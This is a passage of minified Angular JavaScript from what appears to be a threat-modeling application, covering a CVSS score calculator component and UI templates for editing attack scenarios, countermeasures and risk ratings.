be(e),Me(V().entry.I=n)})("change",function(){return be(e),Me(V().CalcScore())}),s(207,"\n "),m(208,"mat-button-toggle",5),s(209,"Undefined"),u(),s(210,"\n "),m(211,"mat-button-toggle",6),oe(212,"translate"),s(213,"None"),u(),s(214,"\n "),m(215,"mat-button-toggle",8),oe(216,"translate"),s(217,"Low"),u(),s(218,"\n "),m(219,"mat-button-toggle",12),oe(220,"translate"),s(221,"High"),u(),s(222,"\n "),u(),s(223,"\n "),u(),s(224,"\n "),u(),s(225,"\n "),m(226,"tr"),s(227,"\n "),m(228,"td"),s(229,"\n User Interaction (UI) \n "),m(230,"mat-icon",1),oe(231,"translate"),s(232,"info"),u(),s(233,"\n "),m(234,"button",2),he("click",function(){return be(e),Me(V().OpenNotes("UI"))}),oe(235,"translate"),s(236,"\n "),m(237,"mat-icon",3),s(238,"edit_note"),u(),s(239,"\n "),u(),s(240,"\n "),u(),s(241,"\n "),m(242,"td"),s(243,"\n Availability (A) \n "),m(244,"mat-icon",1),oe(245,"translate"),s(246,"info"),u(),s(247,"\n "),m(248,"button",2),he("click",function(){return be(e),Me(V().OpenNotes("A"))}),oe(249,"translate"),s(250,"\n "),m(251,"mat-icon",3),s(252,"edit_note"),u(),s(253,"\n "),u(),s(254,"\n "),u(),s(255,"\n "),u(),s(256,"\n "),m(257,"tr"),s(258,"\n "),m(259,"td"),s(260,"\n "),m(261,"mat-button-toggle-group",4),he("ngModelChange",function(n){return be(e),Me(V().entry.UI=n)})("change",function(){return be(e),Me(V().CalcScore())}),s(262,"\n "),m(263,"mat-button-toggle",5),s(264,"Undefined"),u(),s(265,"\n "),m(266,"mat-button-toggle",6),oe(267,"translate"),s(268,"None"),u(),s(269,"\n "),m(270,"mat-button-toggle",13),oe(271,"translate"),s(272,"Required"),u(),s(273,"\n "),u(),s(274,"\n "),u(),s(275,"\n "),m(276,"td"),s(277,"\n "),m(278,"mat-button-toggle-group",4),he("ngModelChange",function(n){return be(e),Me(V().entry.A=n)})("change",function(){return be(e),Me(V().CalcScore())}),s(279,"\n "),m(280,"mat-button-toggle",5),s(281,"Undefined"),u(),s(282,"\n "),m(283,"mat-button-toggle",6),oe(284,"translate"),s(285,"None"),u(),s(286,"\n "),m(287,"mat-button-toggle",8),oe(288,"translate"),s(289,"Low"),u(),s(290,"\n "),m(291,"mat-button-toggle",12),oe(292,"translate"),s(293,"High"),u(),s(294,"\n "),u(),s(295,"\n "),u(),s(296,"\n "),u(),s(297,"\n "),m(298,"tr"),s(299,"\n "),m(300,"td"),s(301,"\n "),m(302,"mat-form-field",14),s(303,"\n "),m(304,"mat-label"),s(305),oe(306,"translate"),u(),s(307,"\n "),m(308,"input",15),he("ngModelChange",function(n){return be(e),Me(V().Vector=n)}),u(),s(309,"\n "),u(),s(310,"\n "),m(311,"button",16),he("click",function(){return be(e),Me(V().CopyVector())}),oe(312,"translate"),s(313,"\n "),m(314,"mat-icon"),s(315,"content_copy"),u(),s(316,"\n "),u(),s(317,"\n "),u(),s(318,"\n "),m(319,"td"),s(320,"\n "),m(321,"mat-form-field",14),s(322,"\n "),m(323,"mat-label"),s(324),oe(325,"translate"),u(),s(326,"\n "),m(327,"input",17),he("ngModelChange",function(n){return be(e),Me(V().Score=n)}),u(),s(328,"\n "),u(),s(329,"\n "),m(330,"button",16),he("click",function(){return be(e),Me(V().OpenCVSS())}),oe(331,"translate"),s(332,"\n "),m(333,"mat-icon"),s(334,"open_in_new"),u(),s(335,"\n "),u(),s(336,"\n "),u(),s(337,"\n "),u(),s(338,"\n"),u()}if(2&t){const e=V();g(6),at("matTooltip",re(7,68,"shared.cvss.av")),g(4),at("matTooltip",re(11,70,"general.Notes")),g(3),F("matBadge",e.GetNotesCountOfMetric("AV"))("matBadgeHidden",e.GetNotesCountOfMetric("AV")<1),g(7),at("matTooltip",re(21,72,"shared.cvss.s")),g(4),at("matTooltip",re(25,74,"general.Notes")),g(3),F("matBadge",e.GetNotesCountOfMetric("S"))("matBadgeHidden",e.GetNotesCountOfMetric("S")<1),g(10),F("ngModel",e.entry.AV),g(5),at("matTooltip",re(43,76,"shared.cvss.av.n")),g(4),at("matTooltip",re(47,78,"shared.cvss.av.a")),g(4),at("matTooltip",re(51,80,"shared.cvss.av.l")),g(4),at("matTooltip",re(55,82,"shared.cvss.av.p")),g(8),F("ngModel",e.entry.S),g(5),at("matTooltip",re(68,84,"shared.cvss.s.u")),g(4),at("matTooltip",re(72,86,"shared.cvss.s.c")),g(11),at("matTooltip",re(83,88,"shared.cvss.ac")),g(4),at("matTooltip",re(87,90,"general.Notes")),g(3),F("matBadge",e.GetNotesCountOfMetric("AC"))("matBadgeHidden",e.GetNotesCountOfMetric("AC")<1),g(7),at("matTooltip",re(97,92,"shared.cvss.c")),g(4),at("matTooltip",re(101,94,"general.Notes")),g(3),F("matBadge",e.GetNotesCountOfMetric("C"))("matBadgeHidden",e.GetNotesCountOfMetric("C")<1),g(10),F("ngModel",e.entry.AC),g(5),at("matTooltip",re(119,96,"shared.cvss.ac.l")),g(4),at("matTooltip",re(123,98,"shared.cvss.ac.h")),g(8),F("ngModel",e.entry.C),g(5),at("matTooltip",re(136,100,"shared.cvss.c.n")),g(4),at("matTooltip",re(140,102,"shared.cvss.c.l")),g(4),at("matTooltip",re(144,104,"shared.cvss.c.h")),g(11),at("matTooltip",re(155,106,"shared.cvss.pr")),g(4),at("matTooltip",re(159,108,"general.Notes")),g(3),F("matBadge",e.GetNotesCountOfMetric("PR"))("matBadgeHidden",e.GetNotesCountOfMetric("PR")<1),g(7),at("matTooltip",re(169,110,"shared.cvss.i")),g(4),at("matTooltip",re(173,112,"general.Notes")),g(3),F("matBadge",e.GetNotesCountOfMetric("I"))("matBadgeHidden",e.GetNotesCountOfMetric("I")<1),g(10),F("ngModel",e.entry.PR),g(5),at("matTooltip",re(191,114,"shared.cvss.pr.n")),g(4),at("matTooltip",re(195,116,"shared.cvss.pr.l")),g(4),at("matTooltip",re(199,118,"shared.cvss.pr.h")),g(8),F("ngModel",e.entry.I),g(5),at("matTooltip",re(212,120,"shared.cvss.i.n")),g(4),at("matTooltip",re(216,122,"shared.cvss.i.l")),g(4),at("matTooltip",re(220,124,"shared.cvss.i.h")),g(11),at("matTooltip",re(231,126,"shared.cvss.ui")),g(4),at("matTooltip",re(235,128,"general.Notes")),g(3),F("matBadge",e.GetNotesCountOfMetric("UI"))("matBadgeHidden",e.GetNotesCountOfMetric("UI")<1),g(7),at("matTooltip",re(245,130,"shared.cvss.a")),g(4),at("matTooltip",re(249,132,"general.Notes")),g(3),F("matBadge",e.GetNotesCountOfMetric("A"))("matBadgeHidden",e.GetNotesCountOfMetric("A")<1),g(10),F("ngModel",e.entry.UI),g(5),at("matTooltip",re(267,134,"shared.cvss.ui.n")),g(4),at("matTooltip",re(271,136,"shared.cvss.ui.r")),g(8),F("ngModel",e.entry.A),g(5),at("matTooltip",re(284,138,"shared.cvss.a.n")),g(4),at("matTooltip",re(288,140,"shared.cvss.a.l")),g(4),at("matTooltip",re(292,142,"shared.cvss.a.h")),g(14),ke(re(306,144,"report.CvssVector")),g(3),F("ngModel",e.Vector),g(3),at("matTooltip",re(312,146,"general.Copy")),g(13),ke(re(325,148,"report.CvssScore")),g(3),F("ngModel",e.Score),g(3),at("matTooltip",re(331,150,"general.openInNew"))}}let Wm=(()=>{class t{constructor(e,i,n,r){this.data=e,this.dataService=i,this.dialog=n,this.clipboard=r,e&&(this.entry=e.Value)}get Score(){return this.entry.Score}set Score(e){this.entry.Score=e}get Vector(){return t.GetVector(this.entry)}set Vector(e){this.SetVector(e)}ngOnInit(){var e;this.Score||this.CalcScore(),null!==(e=this.entry)&&void 0!==e&&e.Notes||(this.entry.Notes={})}CopyVector(){this.clipboard.copy(this.Vector)}OpenCVSS(){const e=t.GetURL(this.entry);e&&window.open(e,"_blank")}CalcScore(){let e=t.GetVector(this.entry);if(e&&e.length>8){const i=new(L5e())(e);this.Score=i.getBaseScore()}}SetVector(e){if(e){let i=!0;const n=["AV","AC","PR","UI","S","C","I","A","CVSS"],r=T=>{const k=n.indexOf(T);k>=0&&n.splice(k,1)},c={};e.split("/").forEach(T=>{if(i){const k=T.split(":");if(2==k.length)if(n.includes(k[0]))switch(k[0]){case"AV":["N","A","L","P"].includes(k[1])?(c[k[0]]=k[1],r(k[0])):i=!1;break;case"AC":["L","H"].includes(k[1])?(c[k[0]]=k[1],r(k[0])):i=!1;break;case"PR":case"C":case"I":case"A":["N","L","H"].includes(k[1])?(c[k[0]]=k[1],r(k[0])):i=!1;break;case"UI":["N","R"].includes(k[1])?(c[k[0]]=k[1],r(k[0])):i=!1;break;case"S":["U","C"].includes(k[1])?(c[k[0]]=k[1],r(k[0])):i=!1;break;case"CVSS":["2.0","3.0","3.1"].includes(k[1])?(c.Version=k[1],r(k[0])):i=!1;break;default:i=!1}else i=!1;else i=!1}}),i&&(Object.keys(c).forEach(T=>{this.entry[T]=c[T]}),this.CalcScore())}}OpenNotes(e){null==this.entry.Notes[e]&&(this.entry.Notes[e]=[]),this.dialog.OpenNotesDialog(this.entry.Notes[e],!0,!1,!0,!0)}GetNotesCountOfMetric(e){return this.entry.Notes[e]?this.entry.Notes[e].length:0}static ToThreatSeverity(e){return e>=9?cn.Critical:e>=7?cn.High:e>=4?cn.Medium:e>0?cn.Low:cn.None}static GetURL(e){let i=t.GetVector(e);const n=e.Version?e.Version:"3.1";return i?"https://nvd.nist.gov/vuln-metrics/cvss/v"+n[0]+"-calculator?vector="+i.substring(i.indexOf("/")+1)+"&version="+n:null}static GetVector(e){if(e){let i="CVSS:"+(e.Version?e.Version:"3.1");return e.Vector?e.Vector.includes("CVSS")?e.Vector:i+"/"+e.Vector:(["AV","AC","PR","UI","S","C","I","A"].forEach(r=>{e[r]&&e[r].length>0&&(i+="/"+r+":"+e[r])}),i)}return null}}return t.\u0275fac=function(e){return new(e||t)(Ee(k5,8),Ee(Yi),Ee(Wn),Ee(hz))},t.\u0275cmp=Wt({type:t,selectors:[["app-cvss-entry"]],inputs:{entry:"entry"},decls:1,vars:1,consts:[[4,"ngIf"],["matTooltipShowDelay","1000",2,"vertical-align","inherit",3,"matTooltip"],["mat-icon-button","",3,"matTooltip","click"],["matBadgeColor","warn","matBadgePosition","below",3,"matBadge","matBadgeHidden"],[3,"ngModel","ngModelChange","change"],["value",""],["value","N","matTooltipShowDelay","1000",3,"matTooltip"],["value","A","matTooltipShowDelay","1000",3,"matTooltip"],["value","L","matTooltipShowDelay","1000",3,"matTooltip"],["value","P","matTooltipShowDelay","1000",3,"matTooltip"],["value","U","matTooltipShowDelay","1000",3,"matTooltip"],["value","C","matTooltipShowDelay","1000",3,"matTooltip"],["value","H","matTooltipShowDelay","1000",3,"matTooltip"],["value","R","matTooltipShowDelay","1000",3,"matTooltip"],["appearance","fill",2,"width","calc(100% - 45px)"],["matInput","",3,"ngModel","ngModelChange"],["mat-icon-button","","matTooltipShowDelay","1000",2,"vertical-align","super","pointer-events","all",3,"matTooltip","click"],["matInput","","type","number",3,"ngModel","ngModelChange"]],template:function(e,i){1&e&&ne(0,z5e,339,152,"table",0),2&e&&F("ngIf",null!=i.entry)},dependencies:[Ri,an,Ac,Ta,Ea,oa,Hh,da,nn,un,Xa,Pa,b8,M8,Xi]}),t})();const W5e=["nameBox"],F5e=["searchASBox"],V5e=["searchLinkedASBox"],B5e=["searchCMBox"],H5e=["searchTCBox"];function U5e(t,a){if(1&t){const e=Ye();m(0,"button",69),he("click",function(){return be(e),Me(V(2).attackScenario.Name="")}),oe(1,"translate"),s(2,"\n "),m(3,"mat-icon"),s(4,"close"),u(),s(5,"\n "),u()}2&t&&at("matTooltip",re(1,1,"general.Clear"))}function q5e(t,a){1&t&&(m(0,"mat-hint",70),s(1),oe(2,"translate"),u()),2&t&&(g(1),ct("\n ",re(2,1,"messages.error.numberAlreadyExists"),"\n "))}function G5e(t,a){if(1&t&&(m(0,"mat-option",71),s(1),oe(2,"translate"),u()),2&t){const e=a.$implicit,i=V(2);F("value",e),g(1),ke(re(2,2,i.GetThreatStateName(e)))}}function j5e(t,a){1&t&&(m(0,"mat-icon",72),oe(1,"translate"),s(2,"sync_problem"),u()),2&t&&at("matTooltip",re(1,1,"pages.modeling.attackscenario.ruleNotApplyingAnymore"))}function Q5e(t,a){if(1&t&&(m(0,"mat-option",71),s(1),u()),2&t){const e=a.$implicit;F("value",e),g(1),ct("\n ",e.Name,"\n ")}}function $5e(t,a){if(1&t&&(m(0,"mat-optgroup",73),s(1,"\n "),ne(2,Q5e,2,2,"mat-option",10),s(3,"\n "),u()),2&t){const e=a.$implicit;F("label",e.name),g(2),F("ngForOf",e.AttackVectors)}}function K5e(t,a){if(1&t&&(m(0,"mat-option",75),s(1),u()),2&t){const e=a.$implicit;at("matTooltip",e.Description),F("value",e),g(1),ct("\n ",e.Name,"\n ")}}function X5e(t,a){if(1&t&&(m(0,"mat-optgroup",73),s(1,"\n "),ne(2,K5e,2,3,"mat-option",74),s(3,"\n "),u()),2&t){const e=a.$implicit;F("label",e.name),g(2),F("ngForOf",e.ThreatCategories)}}function Y5e(t,a){if(1&t&&(m(0,"mat-option",75),s(1),u()),2&t){const e=a.$implicit;at("matTooltip",e.Description),F("value",e),g(1),ct("\n ",e.Name,"\n ")}}function J5e(t,a){if(1&t&&(m(0,"mat-optgroup",73),oe(1,"translate"),s(2,"\n "),ne(3,Y5e,2,3,"mat-option",74),s(4,"\n "),u()),2&t){const e=a.$implicit;at("label",re(1,2,e.name)),g(3),F("ngForOf",e.SystemThreats)}}function Z5e(t,a){if(1&t){const e=Ye();m(0,"mat-checkbox",79),he("change",function(n){return be(e),Me(V(3).ThreatSourcesUpdate(n.checked))}),s(1),oe(2,"translate"),u()}if(2&t){const e=V(3);F("checked",e.ThreatSourcesAll())("indeterminate",e.ThreatSourcesSome()),g(1),ke(re(2,3,e.ThreatSourcesLabel()))}}function e7e(t,a){if(1&t&&(m(0,"mat-option",75),oe(1,"translate"),oe(2,"translate"),s(3),u()),2&t){const e=a.$implicit,i=V(3);Kc("matTooltip","",re(1,4,"general.Likelihood"),": ",re(2,6,i.GetLMHName(e.Likelihood)),""),F("value",e),g(3),ct("\n ",e.Name,"\n ")}}function t7e(t,a){if(1&t){const e=Ye();m(0,"mat-form-field",76),s(1,"\n "),m(2,"mat-label"),s(3),oe(4,"translate"),u(),s(5,"\n "),m(6,"mat-select",24),he("valueChange",function(n){return be(e),Me(V(2).attackScenario.ThreatSources=n)}),s(7,"\n "),m(8,"input",18,77),he("keyup",function(n){return be(e),Me(V(2).OnSearchThreatSources(n))}),oe(10,"translate"),u(),s(11,"\n "),ne(12,Z5e,3,5,"mat-checkbox",78),s(13,"\n "),ne(14,e7e,4,8,"mat-option",74),s(15,"\n "),u(),s(16,"\n "),u()}if(2&t){const e=Ti(9),i=V(2);g(3),ke(re(4,5,"general.ThreatSources")),g(3),F("value",i.attackScenario.ThreatSources),g(2),at("placeholder",re(10,7,"general.Search")),g(4),F("ngIf",0==e.value.length),g(2),F("ngForOf",i.GetThreatSources())}}const A5=function(t){return{item:t}};function i7e(t,a){if(1&t&&(m(0,"button",80),s(1),u()),2&t){const e=a.$implicit;V(),F("matMenuTriggerFor",Ti(178))("matMenuTriggerData",fr(3,A5,e.scenarios)),g(1),ke(e.name)}}function a7e(t,a){if(1&t){const e=Ye();m(0,"button",81),he("click",function(){const r=be(e).$implicit;return Me(V(3).AdoptRiskValuesFrom(r))}),s(1),u()}if(2&t){const e=a.$implicit;at("matTooltip",e.Name),g(1),ke(e.Name)}}function n7e(t,a){if(1&t&&(s(0,"\n "),ne(1,a7e,2,2,"button",40),s(2,"\n ")),2&t){const e=a.item;g(1),F("ngForOf",e)}}function o7e(t,a){if(1&t){const e=Ye();m(0,"button",81),he("click",function(){const r=be(e).$implicit;return Me(V(2).AdoptRiskValuesFrom(r))}),s(1),u()}if(2&t){const e=a.$implicit;at("matTooltip",e.Name),g(1),ke(e.Name)}}function r7e(t,a){if(1&t){const e=Ye();m(0,"mat-form-field",82),s(1,"\n "),m(2,"mat-label"),s(3),oe(4,"translate"),u(),s(5,"\n "),m(6,"input",83),he("ngModelChange",function(n){return be(e),Me(V(2).attackScenario.ScoreCVSS.Score=n)}),u(),s(7,"\n "),m(8,"button",84),he("click",function(n){return be(e),V(2).EditMethodCVSS(),Me(n.stopPropagation())}),s(9,"\n "),m(10,"mat-icon"),s(11,"edit"),u(),s(12,"\n "),u(),s(13,"\n "),m(14,"button",85),he("click",function(n){return be(e),V(2).RemoveMethodCVSS(),Me(n.stopPropagation())}),s(15,"\n "),m(16,"mat-icon"),s(17,"delete"),u(),s(18,"\n "),u(),s(19,"\n "),u()}if(2&t){const e=V(2);g(3),ke(re(4,2,"shared.cvss.name.s")),g(3),F("ngModel",e.attackScenario.ScoreCVSS.Score)}}function s7e(t,a){if(1&t&&(m(0,"mat-option",71),s(1),oe(2,"translate"),u()),2&t){const e=a.$implicit,i=V(3);F("value",e),g(1),ke(re(2,2,i.GetSeverityTypeName(e)))}}function c7e(t,a){if(1&t){const e=Ye();m(0,"mat-form-field",82),s(1,"\n "),m(2,"mat-label"),s(3),oe(4,"translate"),u(),s(5,"\n "),m(6,"mat-select",46),he("valueChange",function(n){return be(e),Me(V(2).attackScenario.ScoreOwaspRR.Score=n)}),s(7,"\n "),m(8,"mat-option"),s(9),oe(10,"translate"),u(),s(11,"\n "),ne(12,s7e,3,4,"mat-option",10),s(13,"\n "),u(),s(14,"\n "),m(15,"button",84),he("click",function(n){return be(e),V(2).EditMethodOwaspRR(),Me(n.stopPropagation())}),s(16,"\n "),m(17,"mat-icon"),s(18,"edit"),u(),s(19,"\n "),u(),s(20,"\n "),m(21,"button",85),he("click",function(n){return be(e),V(2).RemoveMethodOwaspRR(),Me(n.stopPropagation())}),s(22,"\n "),m(23,"mat-icon"),s(24,"delete"),u(),s(25,"\n "),u(),s(26,"\n "),u()}if(2&t){const e=V(2);g(3),ke(re(4,4,"shared.owasprr.name.s")),g(3),F("value",e.attackScenario.ScoreOwaspRR.Score),g(3),ke(re(10,6,"properties.selectNone")),g(3),F("ngForOf",e.GetSeverityTypes())}}function l7e(t,a){if(1&t&&(m(0,"mat-option",71),s(1),oe(2,"translate"),u()),2&t){const e=a.$implicit,i=V(2);F("value",e),g(1),ke(re(2,2,i.GetSeverityTypeName(e)))}}function d7e(t,a){if(1&t){const e=Ye();m(0,"button",86),he("click",function(n){return be(e),V(2).attackScenario.SeverityReason="",Me(n.stopPropagation())}),s(1,"\n "),m(2,"mat-icon"),s(3,"edit_note"),u(),s(4,"\n "),u()}}function m7e(t,a){if(1&t){const e=Ye();m(0,"button",86),he("click",function(n){return be(e),V(2).attackScenario.SeverityReason=null,Me(n.stopPropagation())}),s(1,"\n "),m(2,"mat-icon"),s(3,"playlist_remove"),u(),s(4,"\n "),u()}}function u7e(t,a){if(1&t&&(m(0,"mat-option",71),s(1),oe(2,"translate"),u()),2&t){const e=a.$implicit,i=V(2);F("value",e),g(1),ke(re(2,2,i.GetLMHName(e)))}}function h7e(t,a){if(1&t){const e=Ye();m(0,"button",86),he("click",function(n){return be(e),V(2).attackScenario.LikelihoodReason="",Me(n.stopPropagation())}),s(1,"\n "),m(2,"mat-icon"),s(3,"edit_note"),u(),s(4,"\n "),u()}}function f7e(t,a){if(1&t){const e=Ye();m(0,"button",86),he("click",function(n){return be(e),V(2).attackScenario.LikelihoodReason=null,Me(n.stopPropagation())}),s(1,"\n "),m(2,"mat-icon"),s(3,"playlist_remove"),u(),s(4,"\n "),u()}}function p7e(t,a){if(1&t&&(m(0,"mat-option",71),s(1),oe(2,"translate"),u()),2&t){const e=a.$implicit,i=V(2);F("value",e),g(1),ke(re(2,2,i.GetSeverityTypeName(e)))}}function _7e(t,a){if(1&t){const e=Ye();m(0,"button",86),he("click",function(n){return be(e),V(2).attackScenario.RiskReason="",Me(n.stopPropagation())}),s(1,"\n "),m(2,"mat-icon"),s(3,"edit_note"),u(),s(4,"\n "),u()}}function g7e(t,a){if(1&t){const e=Ye();m(0,"button",86),he("click",function(n){return be(e),V(2).attackScenario.RiskReason=null,Me(n.stopPropagation())}),s(1,"\n "),m(2,"mat-icon"),s(3,"playlist_remove"),u(),s(4,"\n "),u()}}function C7e(t,a){if(1&t&&(m(0,"mat-option",71),s(1),oe(2,"translate"),u()),2&t){const e=a.$implicit,i=V(2);F("value",e),g(1),ke(re(2,2,i.GetRiskStrategyName(e)))}}function y7e(t,a){if(1&t){const e=Ye();m(0,"mat-form-field",26),s(1,"\n "),m(2,"mat-label"),s(3),oe(4,"translate"),u(),s(5,"\n "),m(6,"textarea",27),he("ngModelChange",function(n){return be(e),Me(V(2).attackScenario.SeverityReason=n)}),u(),s(7,"\n "),u()}if(2&t){const e=V(2);g(3),ke(re(4,3,"properties.SeverityReason")),g(3),F("spellcheck",e.dataService.HasSpellCheck)("ngModel",e.attackScenario.SeverityReason)}}function b7e(t,a){if(1&t){const e=Ye();m(0,"mat-form-field",26),s(1,"\n "),m(2,"mat-label"),s(3),oe(4,"translate"),u(),s(5,"\n "),m(6,"textarea",27),he("ngModelChange",function(n){return be(e),Me(V(2).attackScenario.LikelihoodReason=n)}),u(),s(7,"\n "),u()}if(2&t){const e=V(2);g(3),ke(re(4,3,"properties.LikelihoodReason")),g(3),F("spellcheck",e.dataService.HasSpellCheck)("ngModel",e.attackScenario.LikelihoodReason)}}function M7e(t,a){if(1&t){const e=Ye();m(0,"mat-form-field",26),s(1,"\n "),m(2,"mat-label"),s(3),oe(4,"translate"),u(),s(5,"\n "),m(6,"textarea",27),he("ngModelChange",function(n){return be(e),Me(V(2).attackScenario.RiskReason=n)}),u(),s(7,"\n "),u()}if(2&t){const e=V(2);g(3),ke(re(4,3,"properties.RiskReason")),g(3),F("spellcheck",e.dataService.HasSpellCheck)("ngModel",e.attackScenario.RiskReason)}}function v7e(t,a){if(1&t&&(m(0,"button",80),s(1),u()),2&t){const e=a.$implicit;V(),F("matMenuTriggerFor",Ti(321))("matMenuTriggerData",fr(3,A5,e.countermeasures)),g(1),ke(e.name)}}function A7e(t,a){if(1&t){const e=Ye();m(0,"button",81),he("click",function(){const r=be(e).$implicit;return Me(V(3).AddExistingCountermeasure(r))}),s(1),u()}if(2&t){const e=a.$implicit;at("matTooltip",e.Name),g(1),ke(e.Name)}}function T7e(t,a){if(1&t&&(s(0,"\n "),ne(1,A7e,2,2,"button",40),s(2,"\n ")),2&t){const e=a.item;g(1),F("ngForOf",e)}}function E7e(t,a){if(1&t){const e=Ye();m(0,"button",81),he("click",function(){const r=be(e).$implicit;return Me(V(2).AddExistingCountermeasure(r))}),s(1),u()}if(2&t){const e=a.$implicit;at("matTooltip",e.Name),g(1),ke(e.Name)}}function D7e(t,a){if(1&t){const e=Ye();m(0,"mat-list-item",87),he("click",function(){const r=be(e).$implicit;return Me(V(2).selectedCountermeasure=r)}),s(1,"\n "),m(2,"mat-icon",88),s(3,"arrow_right"),u(),s(4,"\n "),m(5,"div",89),s(6),oe(7,"translate"),u(),s(8,"\n "),m(9,"button",90),he("click",function(){const r=be(e).$implicit;return Me(V(2).RemoveCountermeasure(r))}),oe(10,"translate"),m(11,"mat-icon"),s(12,"remove"),u()(),s(13,"\n "),m(14,"button",91),he("click",function(){const r=be(e).$implicit;return Me(V(2).DeleteCountermeasure(r))}),oe(15,"translate"),m(16,"mat-icon"),s(17,"delete"),u()(),s(18,"\n "),u()}if(2&t){const e=a.$implicit,i=V(2);Ct("highlight-light",i.selectedCountermeasure===e&&!i.theme.IsDarkMode)("highlight-dark",i.selectedCountermeasure===e&&i.theme.IsDarkMode),at("matTooltip",e.Name),g(6),ke(re(7,8,e.Name)),g(3),at("matTooltip",re(10,10,"general.Remove")),g(5),at("matTooltip",re(15,12,"general.Delete"))}}function x7e(t,a){if(1&t&&(m(0,"div",92),s(1,"\n "),it(2,"app-countermeasure",93),s(3,"\n "),u()),2&t){const e=V(2);g(2),F("countermeasure",e.selectedCountermeasure)}}function w7e(t,a){if(1&t&&(s(0,"\n "),it(1,"app-cve-entry",95),s(2,"\n ")),2&t){const e=V(3);g(1),F("entry",e.attackScenario.CveEntry)}}function I7e(t,a){if(1&t&&(m(0,"mat-expansion-panel"),s(1,"\n "),m(2,"mat-expansion-panel-header"),s(3,"\n "),m(4,"mat-panel-title"),s(5),oe(6,"translate"),u(),s(7,"\n "),m(8,"mat-panel-description"),s(9),m(10,"mat-icon"),s(11,"info"),u(),s(12,"\n "),u(),s(13,"\n "),u(),s(14,"\n "),ne(15,w7e,3,1,"ng-template",94),s(16,"\n "),u()),2&t){const e=V(2);g(5),ct("\n ",re(6,2,"general.CveInfo"),"\n "),g(4),ct("\n ",e.attackScenario.CveEntry.ID,"\n ")}}function R7e(t,a){if(1&t&&(s(0,"\n "),it(1,"app-attack-vector",96),s(2,"\n ")),2&t){const e=V(3);g(1),F("canEdit",!1)("attackVector",e.attackScenario.AttackVector)}}function S7e(t,a){if(1&t&&(m(0,"mat-expansion-panel"),s(1,"\n "),m(2,"mat-expansion-panel-header"),s(3,"\n "),m(4,"mat-panel-title"),s(5),oe(6,"translate"),u(),s(7,"\n "),m(8,"mat-panel-description"),s(9),m(10,"mat-icon"),s(11,"info"),u(),s(12,"\n "),u(),s(13,"\n "),u(),s(14,"\n "),ne(15,R7e,3,2,"ng-template",94),s(16,"\n "),u()),2&t){const e=V(2);g(5),ct("\n ",re(6,2,"general.AttackVectorInfo"),"\n "),g(4),ct("\n ",e.attackScenario.AttackVector.Name,"\n ")}}function k7e(t,a){if(1&t&&(s(0,"\n "),it(1,"app-threat-question",97),s(2,"\n ")),2&t){const e=V(3);g(1),F("canEdit",!1)("threatQuestion",e.attackScenario.ThreatQuestion)}}function P7e(t,a){if(1&t&&(m(0,"mat-expansion-panel"),s(1,"\n "),m(2,"mat-expansion-panel-header"),s(3,"\n "),m(4,"mat-panel-title"),s(5),oe(6,"translate"),u(),s(7,"\n "),m(8,"mat-panel-description"),s(9),m(10,"mat-icon"),s(11,"info"),u(),s(12,"\n "),u(),s(13,"\n "),u(),s(14,"\n "),ne(15,k7e,3,2,"ng-template",94),s(16,"\n "),u()),2&t){const e=V(2);g(5),ct("\n ",re(6,2,"general.Question"),"\n "),g(4),ct("\n ",e.attackScenario.ThreatQuestion.Name,"\n ")}}function O7e(t,a){if(1&t&&(s(0,"\n "),it(1,"app-threat-rule",98),s(2,"\n ")),2&t){const e=V(3);g(1),F("canEdit",!1)("threatRule",e.attackScenario.ThreatRule)}}function N7e(t,a){if(1&t&&(m(0,"mat-expansion-panel"),s(1,"\n "),m(2,"mat-expansion-panel-header"),s(3,"\n "),m(4,"mat-panel-title"),s(5),oe(6,"translate"),u(),s(7,"\n "),m(8,"mat-panel-description"),s(9),m(10,"mat-icon"),s(11,"info"),u(),s(12,"\n "),u(),s(13,"\n "),u(),s(14,"\n "),ne(15,O7e,3,2,"ng-template",94),s(16,"\n "),u()),2&t){const e=V(2);g(5),ct("\n ",re(6,2,"general.Rule"),"\n "),g(4),ct("\n ",e.attackScenario.ThreatRule.Name,"\n ")}}function L7e(t,a){if(1&t&&(m(0,"button",80),s(1),u()),2&t){const e=a.$implicit;V(),F("matMenuTriggerFor",Ti(381))("matMenuTriggerData",fr(3,A5,e.scenarios)),g(1),ke(e.name)}}function z7e(t,a){if(1&t){const e=Ye();m(0,"button",81),he("click",function(){const r=be(e).$implicit;return Me(V(3).OnLinkScenario(r))}),s(1),u()}if(2&t){const e=a.$implicit;at("matTooltip",e.Name),g(1),ke(e.Name)}}function W7e(t,a){if(1&t&&(s(0,"\n "),ne(1,z7e,2,2,"button",40),s(2,"\n ")),2&t){const e=a.item;g(1),F("ngForOf",e)}}function F7e(t,a){if(1&t){const e=Ye();m(0,"button",81),he("click",function(){const r=be(e).$implicit;return Me(V(2).OnLinkScenario(r))}),s(1),u()}if(2&t){const e=a.$implicit;at("matTooltip",e.Name),g(1),ke(e.Name)}}function V7e(t,a){if(1&t){const e=Ye();m(0,"mat-list-item",87),he("click",function(){const r=be(e).$implicit;return Me(V(2).selectedLinkedScenario=r)}),s(1,"\n "),m(2,"mat-icon",88),s(3,"arrow_right"),u(),s(4,"\n "),m(5,"div",89),s(6),u(),s(7,"\n "),m(8,"button",90),he("click",function(){const r=be(e).$implicit;return Me(V(2).EditAttackScenario(r))}),oe(9,"translate"),m(10,"mat-icon"),s(11,"edit"),u()(),s(12,"\n "),m(13,"button",91),he("click",function(){const r=be(e).$implicit;return Me(V(2).OnUnlinkScenario(r))}),oe(14,"translate"),m(15,"mat-icon"),s(16,"remove"),u()(),s(17,"\n "),u()}if(2&t){const e=a.$implicit,i=V(2);Ct("highlight-light",i.selectedLinkedScenario===e&&!i.theme.IsDarkMode)("highlight-dark",i.selectedLinkedScenario===e&&i.theme.IsDarkMode),at("matTooltip",e.Name),g(6),ke(e.Name),g(2),at("matTooltip",re(9,8,"general.Edit")),g(5),at("matTooltip",re(14,10,"general.Remove"))}}function B7e(t,a){if(1&t&&(m(0,"div",92),s(1,"\n "),it(2,"app-attack-scenario",99),s(3,"\n "),u()),2&t){const e=V(2);g(2),F("canEdit",!1)("attackScenario",e.selectedLinkedScenario)}}function H7e(t,a){if(1&t){const e=Ye();m(0,"button",81),he("click",function(){const r=be(e).$implicit;return Me(V(3).OnLinkTestCase(r))}),s(1),u()}if(2&t){const e=a.$implicit;at("matTooltip",e.Name),g(1),ke(e.Name)}}function U7e(t,a){if(1&t){const e=Ye();m(0,"button",81),he("click",function(){const r=be(e).$implicit;return Me(V(3).OnLinkTestCase(r))}),s(1),u()}if(2&t){const e=a.$implicit;at("matTooltip",e.Name),g(1),ke(e.Name)}}function 